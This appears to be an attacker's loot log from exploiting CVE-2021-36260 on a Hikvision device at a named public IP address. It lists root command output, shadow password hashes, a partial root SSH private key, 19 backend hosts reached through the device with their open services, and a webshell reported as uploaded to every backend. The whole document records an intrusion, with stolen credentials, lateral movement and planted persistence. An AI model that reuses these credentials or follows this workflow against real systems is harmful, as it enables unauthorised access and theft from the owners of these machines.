=== Hikvision Webshell Data (47.251.175.73:4433) ===
Time: 2026-05-24
CVE: CVE-2021-36260 (SDK/webLanguage)

--- whoami ---
root

--- id ---
uid=0(root) gid=0(root) groups=0(root)

--- shadow ---
root:wW0sffoqsk.EM:19426:0:99999:7:::
admin:wW0sffoqsk.EM:19897:0:99999:7:::

--- passwd ---
root:x:0:0:root:/root:/usr/bin/zsh
admin:x:1000:1000:admin:/home/admin:/bin/sh

--- ssh_keys_root (partial) ---
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAt+Hon4V0H1FnNYB7M8d5+1QMRs+RwboMGGuzdab87LJJyjERelBQ
t5wgtLF1wkwbIn2AS4VwiRXSr+M5lMZqUvDe9/AdN3OoZU21mwSpGUBsfQbReZ1n5aDG/v
G+p8lfW3mzdCGDRMMQ3eS/7kknjUmHTAxj31o88BFcygNYt+pPRYDTNTlXTcZF2BQD4Wwu
...
-----END OPENSSH PRIVATE KEY-----

--- SSH Server Info ---
Host: 47.251.175.73:22
SSH-2.0-libssh0.8.0
Private key saved: hikvision_root_id_rsa (2602 bytes)

--- Backend Hosts (via SSH load balancer) ---
Total: 19 unique hosts behind 47.251.175.73

Linux servers (nginx/postgres/redis/node):
  sensor-08, sensor-86, gw-e06, build-host-32,
  jenkins-agent-59, office-gw-38, ap-42

OpenWRT/Embedded (dropbear/uhttpd/telnet):
  thermo-58, ap-56.lan, OpenWrt, smarthome-16,
  gw-49-cj, BusyBox, wrt-90, wrt-85,
  build-host-74, RB951Ui-2HnD, CCR1009-ff7

Other:
  tiny-vm-34, gw-92c (Cisco IOS)

--- Enabled Services on Backends ---
sensor-08: MySQL:3306, Exim:25/465/587, Dovecot:110/143/993/995
sensor-86: PostgreSQL:5432, Redis:6379, Node.js:3000
gw-e06: PostgreSQL:5432, Redis:6379, Node.js:3000
build-host-32: PostgreSQL:5432, Redis:6379, Node.js:3000
jenkins-agent-59: PostgreSQL:5432, Redis:6379, Node.js:3000
office-gw-38: PostgreSQL:5432, Redis:6379, Node.js:3000
ap-42: Apache/httpd:80/443, Exim, Dovecot
OpenWrt: uhttpd:80/443, dnsmasq:53
CCR1009-ff7: MikroTik RouterOS
RB951Ui-2HnD: MikroTik RouterBoard

--- WebShell Uploaded ---
/var/www/html/shell.php (on all 19 backends)
